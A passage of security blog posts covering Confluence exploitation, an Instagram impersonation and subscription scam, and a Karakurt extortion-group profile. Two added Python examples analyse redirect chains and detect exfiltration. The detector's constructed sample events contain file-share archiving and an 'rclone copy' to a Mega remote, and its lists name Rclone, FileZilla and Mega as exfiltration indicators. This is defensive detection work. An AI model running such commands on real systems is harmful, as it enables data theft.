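    for host, verdict in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {verdict}")
```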

The current situation

Here are the latest observations from Microsoft:

Microsoft continues:

In many cases impacted devices have been observed with multiple disparate instances of malicious activity, including extensive device and domain discovery, and the deployment of payloads like Cobalt Strike, web shells, botnets like Mirai and Kinsing, coin miners, and ransomware.

A mixed bag of attacks

Industrious malware authors really have been having a grand time of things with this vulnerability. As noted by Microsoft, several varied approaches to compromise and exploitation are being used. AvosLocker Ransomware and Linux botnets are getting in on the action. Cryptomining jumping on the bandwagon is an inevitability across most scams we see, and this is no exception.

Microsoft also noticed the Confluence vulnerability being exploited to download and deploy Cerber2021 ransomware. The Record observed that Cerber2021 is a “relatively minor player”, with both Windows and Linux versions used to lock up machines. Here’s an example of the ransomware, via MalwareHunterTeam:

Having the fixes to address this issue is great, but organisations need to actually make use of them. This is still a serious problem for anyone using unpatched versions of affected Confluence installations.

If you don’t want to run the gauntlet of APT groups, cryptomining chancers, botnets and more, the message is loud and clear: get on over to the Confluence Download Archives and patch immediately.


Instagram scam steals your selfies to trick your friends

What would you do if a friend of yours set up an NSFW account, and then used it to follow you on Instagram? Would you check it out?

We recently learned of a group of friends who had to ask themselves exactly that. Fortunately, they realised that something was off. The account wasn’t the real owner’s; it just used her identity and left her with a mess to clean up.

A scam “NSFW” profile using safe-for-work pictures stolen from a legitimate account

We learned about the scam from Malwarebytes’ former social media guru, Amanda, who was one of its targets. She graciously allowed us to use her screenshots in this article in the interests of teaching others about the scam.

It started with Amanda’s real Instagram account, her name, her pictures, and her followers. The scammers used them to create a simple “NSFW” Instagram account designed to look like it belonged to her, and then tried to lure her friends into visiting it by following them.

Friends who checked out the new account saw a face they recognised in a context they didn’t: An Instagram account that promised it’s “NOT SAFE FOR WORK” and “FOR YOUR EYES ONLY”. The public account had no posts, just a story with another stolen picture and a caption urging visitors to “VISIT MY PROFILE ON NAKED SITE”, where they were promised access to a limited number of slots for “exclusive content”. The profile included the URL of a Wix.com website that described itself as “my secret account”.

Scammers know that their websites are unlikely to stay up for long before being blocked, so services like Wix that make it easy to create professional-looking sites quickly, for free, are used to create “burner” websites that are here today and gone tomorrow.

The site featured another photo stolen from Amanda’s Instagram account as its profile picture, surrounded by NSFW and pornographic stock art.

Of course, this wasn’t a “secret account”, there were no “FREE LIVE SHOWS”, and there was no “private content”. In fact there was barely a site. There was just enough to lure in anybody whose curiosity had got the better of their critical thinking skills.

A Wix “burner” website using a stolen profile picture

Click on a link (any link at all) and you’d end up at a different domain, at an unbranded “age verification” page hungry for an email, username, and password, so you could “JOIN NOW”.

If you’d found yourself here and wondered why it looks nothing like the site you started on, the clue is in the URL: The long SID parameter is likely an affiliate code. This tells the owner of this site which affiliate sent the traffic here (and who they should pay for providing it). The affiliate stole Amanda’s identity to get you here, but the owners of this site may not know about that, and may not care.

Eagle-eyed readers will also have noticed that an email, username, and password don’t say anything about how old you are, and this rabbit hole didn’t end here.

An unbranded age verification page

What the scammers really wanted, all they ever wanted, was your credit card number. Underneath the bold “Free Verification” banner, the small print reveals what this is really all about—tricking people into joining expensive subscription services.

Your access to Nightly Encounter includes a 2 day free trial promo to Locating Someone Special Nearby. If you choose to remain a member of Locating Someone Special Nearby beyond the trial period, your membership will renew at thirty nine ninety nine.

Fortunately for us, a fake credit card was enough to get us through the door and explore a bit further without rewarding the scammers.

The “Free Verification” page wants your credit card details

If you’d got this far, the scammers would have known a number of very important pieces of information about you. Your ID and credit card details, obviously, but also something else that’s valuable too—that you are willing to hand those things over.

And if they got you to do it once, why not try to do it again?

Handing over your credit card wouldn’t get you to the long-ago promised NSFW content starring your friend, or even Nightly Encounter or Locating Someone Special Nearby, whatever they are.

Instead, you’d find yourself on a different site, entering yet another username, password and email into a different “Secure Billing Platform” so another affiliate gets paid for serving you up on a platter.

Yet another “secure billing platform”
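The long SID parameter discussed earlier, and the second affiliate being paid on the billing step, are easier to see when the redirect chain is laid out hop by hop. The following is an added example, not part of the original post: it takes a list of URLs in the order a victim would be bounced through them and reports, for each hop, the host, any parameters that look like affiliate or tracking IDs, and which of those IDs were carried over from the previous hop. The chain itself is constructed with hypothetical `.test` domains and made-up token values; the set of parameter names and the "16+ alphanumeric characters" rule for spotting an unnamed tracking token are assumptions of mine.

```python
# Added example: summarise an affiliate redirect chain. Constructed URLs and
# hypothetical domains; parameter-name list and token heuristic are assumptions.
from urllib.parse import urlsplit, parse_qsl

# Names commonly used for affiliate / click tracking IDs (assumption;
# 'sid' is the one seen in the scam described in the post).
TRACKING_PARAMS = {"sid", "aff", "affid", "aff_id", "affiliate", "ref",
                   "refid", "cid", "clickid", "subid", "utm_source"}

# Constructed chain: Wix "burner" site -> age check -> signup -> billing.
CHAIN = [
    "https://my-secret-account.example-wix.test/",
    "https://age-check.example.test/verify?sid=9f3b2c1e7a8d4b6e5f0a1c2d3e4f5a6b&lang=en",
    "https://join.example-dating.test/signup?sid=9f3b2c1e7a8d4b6e5f0a1c2d3e4f5a6b&offer=nightly",
    "https://billing.example-pay.test/checkout?clickid=7c5d0e4f2a1b9c8d&plan=2day",
]


def tracking_ids(url):
    """Query parameters that look like affiliate/tracking IDs: a known name,
    or an opaque alphanumeric value of 16+ characters (assumed heuristic)."""
    found = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if key.lower() in TRACKING_PARAMS or (len(value) >= 16 and value.isalnum()):
            found[key] = value
    return found


def summarize_chain(urls):
    """One record per hop: host, tracking IDs, and which IDs were carried
    over from the previous hop (same affiliate) versus newly introduced."""
    hops = []
    previous_values = set()
    for index, url in enumerate(urls):
        ids = tracking_ids(url)
        hops.append({
            "hop": index,
            "host": urlsplit(url).hostname or "",
            "ids": ids,
            "carried_from_previous": [v for v in ids.values() if v in previous_values],
        })
        previous_values = set(ids.values())
    return hops


if __name__ == "__main__":
    for hop in summarize_chain(CHAIN):
        new = [v for v in hop["ids"].values() if v not in hop["carried_from_previous"]]
        print(f"hop {hop['hop']}: {hop['host']}  carried={hop['carried_from_previous']}  new={new}")
```

Run against a real chain captured from a browser's network log, the same token appearing on hops 1 and 2 tells you one affiliate is being credited for both the "age verification" and the first subscription, while a fresh token on the billing hop marks where a second party starts getting paid.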

Your reward? Another request for your credit card details, for another subscription you didn’t need.

At this point (and to no small relief) our fake credit card details lost their magical powers of persuasion and we couldn’t go any further.

The end of the road

It’s not unusual for victims to double down as doubts start to creep in, and the scammers are ready to squeeze every last penny, and every last vestige of hope, from their victims.

If you are the victim of an ID theft like this, report the scam accounts and sites to the platforms operating them. The Instagram account used in this scam is gone and, to its huge credit, Wix removed the scam site within literal seconds of being alerted to it.

If photos you own are used without your permission, then the scammer has violated your copyright. You can take action by filling in a DMCA takedown form.

Unfortunately we can’t offer you much for the shock and alarm of finding your public persona twisted by scammers in search of a few affiliate dollars, but you have our sympathy.

The post Instagram scam steals your selfies to trick your friends appeared first on Malwarebytes Labs.

Karakurt extortion group: Threat profile

The FBI (Federal Bureau of Investigation), together with CISA (Cybersecurity and Infrastructure Security Agency) and other federal agencies, recently released a joint cybersecurity advisory (CSA) about the Karakurt data extortion group (also known as Karakurt Team and Karakurt Lair).

Like RansomHouse, Karakurt doesn’t bother encrypting data. Instead, it just steals the data and demands a ransom. If the victim organization refuses to pay up, the stolen data is auctioned off or leaked to the public for anyone to scrape and misuse for personal gain.

One may wonder why federal agencies decided to focus on Karakurt when it is a relatively obscure group. It has no high-profile attacks attributed to it and doesn’t appear to have a large number of victims under its belt.

According to Bleeping Computer, Karakurt is said to be the “data extortion arm” of the Conti ransomware syndicate. Further evidence from blockchain analysis firm Chainalysis and incident response firm Tetra Defense backs this up. In a report last month, they assessed “with a high degree of confidence” that Karakurt is “operationally linked to both Conti and Diavol ransomware groups”.

Karakurt extortion group

karakurt logo

The Karakurt group got its name from a type of black widow spider. Researchers have pointed out that the group likens its extortion tactics to a karakurt spider’s bite.

Screenshot of a section of the group’s “blurb” on its dark web leak page
(Source: Arctic Wolf)
Karakurt's poison is very toxic and dangerous. Don't waste your time.
What would you do? Of course you will have to take an antidote.
In your situation it means that you still have a chance to survive. But it will cost as double.
All you need is to accept our terms and conditions without any sort of bargain.

The NCC Group’s Cyber Incident Response Team (CIRT) spotlighted Karakurt activities in February 2022. However, Karakurt, known initially as the Karakurt Hacking Team (KHT), has been around since June 2021, when the domains and accounts associated with the group were created: its dump sites first, followed by its Twitter account in August 2021.

Per a report from Accenture Security, Karakurt wasn’t actively extorting until September 2021. Within two months, the extortion group had already hit 40 organizations across multiple industries. Experts from Digital Shadows dispute this number, however, putting the victim count at more than 80.

Karakurt isn’t picky about which industries it targets. It does, however, prefer small organizations based in the US, the UK, Canada, and Germany.

The extortion group gains access through single-factor Fortigate VPN (Virtual Private Network) servers, logging in with legitimate Active Directory credentials. It is unknown how the group obtains these credentials; what is clear is that, once inside, it ends up with administrative access and privileges on compromised servers.

From there, Karakurt draws on the various tools at its disposal. Depending on its goals, the group may take a “living off the land” approach, relying on tooling already present in the environment for its intrusion techniques, or bring in common post-exploitation tools like Cobalt Strike, AnyDesk, and Mimikatz.

Once Karakurt has identified the data it wants to exfiltrate, it uses 7-Zip and WinZip to compress the files before sending them to Mega.io via FileZilla or Rclone.

Karakurt’s home page
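The archive-then-upload sequence described above is one of the few Karakurt behaviours that is easy to turn into a detection, because both halves are ordinary processes that leave process-creation events behind. The following is an added example, not from the advisory or from Malwarebytes: it runs over a small set of constructed, Sysmon-style process-creation records and raises an alert whenever FileZilla or Rclone starts on a host within a window of a 7-Zip or WinZip run, marking the alert high severity when a Mega destination is visible on the command line. The event field names, the 30-minute window, the executable names and the strings used to recognise Mega (in particular the rclone remote name `mega:`, which is a guess; rclone keeps the remote's type in its config file, not on the command line) are all assumptions.

```python
# Added example: flag "archive, then upload" activity on a host. Constructed
# events; field names, window, tool names and Mega hints are assumptions.
from datetime import datetime, timedelta

ARCHIVERS = {"7z.exe", "7zg.exe", "winzip32.exe", "winzip64.exe"}
TRANSFER_TOOLS = {"rclone.exe", "filezilla.exe"}
# Strings suggesting a Mega destination. "mega:" assumes the operator named
# the rclone remote after the service; rclone stores the remote *type* in its
# config, so a real detection should also watch rclone.conf contents.
MEGA_HINTS = ("mega.io", "mega.nz", "mega.co.nz", "mega:")


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M")


# Constructed sample of process-creation events (Sysmon Event ID 1 style).
EVENTS = [
    {"ts": _ts("2022-06-01 09:02"), "host": "WS01",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a -mx1 C:\Users\Public\hr.7z \\fs01\HR\*"},
    {"ts": _ts("2022-06-01 09:15"), "host": "WS01",
     "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Users\Public\hr.7z mega:upload --transfers 8"},
    {"ts": _ts("2022-06-01 10:00"), "host": "WS02",
     "image": r"C:\Program Files\WinZip\winzip64.exe",
     "cmdline": r"winzip64.exe -a C:\Temp\quarterly.zip C:\Finance\*"},
    {"ts": _ts("2022-06-01 12:30"), "host": "WS02",
     "image": r"C:\Program Files\FileZilla FTP Client\filezilla.exe",
     "cmdline": "filezilla.exe"},
    {"ts": _ts("2022-06-01 11:00"), "host": "WS03",
     "image": r"C:\Tools\rclone.exe",
     "cmdline": r"rclone.exe sync D:\backups onedrive:backups"},
    {"ts": _ts("2022-06-01 13:00"), "host": "WS04",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a C:\ProgramData\legal.7z C:\Shares\Legal\*"},
    {"ts": _ts("2022-06-01 13:05"), "host": "WS04",
     "image": r"C:\Program Files\FileZilla FTP Client\filezilla.exe",
     "cmdline": "filezilla.exe"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_exfil_chains(events=EVENTS, window_minutes=30):
    """Alerts for hosts where a transfer tool starts within `window_minutes`
    of an archiver run on the same host. 'high' when a Mega hint is visible."""
    window = timedelta(minutes=window_minutes)
    by_host = {}
    for e in sorted(events, key=lambda ev: ev["ts"]):
        by_host.setdefault(e["host"], []).append(e)

    alerts = []
    for host, evs in by_host.items():
        archive_runs = []
        for e in evs:
            name = _basename(e["image"])
            if name in ARCHIVERS:
                archive_runs.append(e)
                continue
            if name not in TRANSFER_TOOLS:
                continue
            staged = [a for a in archive_runs if e["ts"] - a["ts"] <= window]
            if not staged:
                continue  # upload with no recent archiving (e.g. routine backup): not this pattern
            last = staged[-1]
            cmd = e["cmdline"].lower()
            alerts.append({
                "host": host,
                "severity": "high" if any(h in cmd for h in MEGA_HINTS) else "medium",
                "archiver": _basename(last["image"]),
                "transfer_tool": name,
                "gap_minutes": int((e["ts"] - last["ts"]).total_seconds() // 60),
                "cmdline": e["cmdline"],
            })
    return alerts


if __name__ == "__main__":
    for alert in find_exfil_chains():
        print(alert)
```

On the sample data WS01 (7-Zip followed by an rclone copy to a `mega:` remote) comes out as high severity, WS04 (7-Zip followed by FileZilla, destination not visible) as medium, and WS02 is ignored because the two and a half hours between archiving and FileZilla fall outside the window; widen the window and it appears too. The medium tier matters in practice: FileZilla is a GUI client, so the destination only shows up in network telemetry, not on the command line.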

Karakurt demands a ransom ranging from $25,000 to $13M in Bitcoin. The payment deadline is typically seven days after the victim contacts the extortion group.

Splintering into cells

Ransomware groups have been going through a new phase for a few months now. Where they aren’t splitting into smaller groups (“cells”) that join other criminal outfits, they are rotating the malware they use to avoid growing US sanctions and pressure from law enforcement.

Things started changing after the US officially sanctioned Evil Corp, the Russian group behind the Dridex banking Trojan, both for ransomware victims and for the affiliates that deploy ransomware. Victims began refusing to pay in order to comply with sanctions, and the groups began rotating ransomware variants in their campaigns to avoid being associated with a sanctioned entity.

With Conti “gone,” a splintering also happened within the syndicate. Researchers from Advanced Intel have data showing members of the former ransomware syndicate dispersing from the core group to join smaller ransomware groups.

Conti is not affiliated with Evil Corp, but both groups are in a similar bind: one that hurts their profit margins, though not enough to make them give up criminal life altogether. Unfortunately, members and affiliates gain from splintering and distancing themselves from these groups.

In an interview with the Wall Street Journal, Kimberly Goody, Mandiant’s director of cybercrime analysis, said that these changes obscured Evil Corp hackers’ identities “at the point of attack, throwing off investigators and sanction-compliant victim companies”. The same can be said about former actors associated with the Conti syndicate.

Keep Karakurt away from your network and data

We advise organizations to prioritize mitigations that keep extortion groups like Karakurt from successfully infiltrating their networks. Here are some ways to do that.

  • Implement multi-factor authentication (MFA) on every business access point, above all on VPNs that currently accept a single factor
  • Ensure that all domain controllers are kept updated with the latest patches
  • Disable unused ports and services
  • Install an efficient and effective endpoint security solution that focuses on a layered approach to protecting systems and business assets
  • Create and implement a recovery plan (if your business doesn’t have one already), including how to maintain and retain backups
  • Segment your network to keep bad guys from reaching destinations that house your organization’s most sensitive and proprietary data
  • Audit high-privileged accounts regularly

The federal agencies list further mitigations in the advisory itself.

Stay safe!

The post Karakurt extortion group: Threat profile appeared first on Malwarebytes Labs.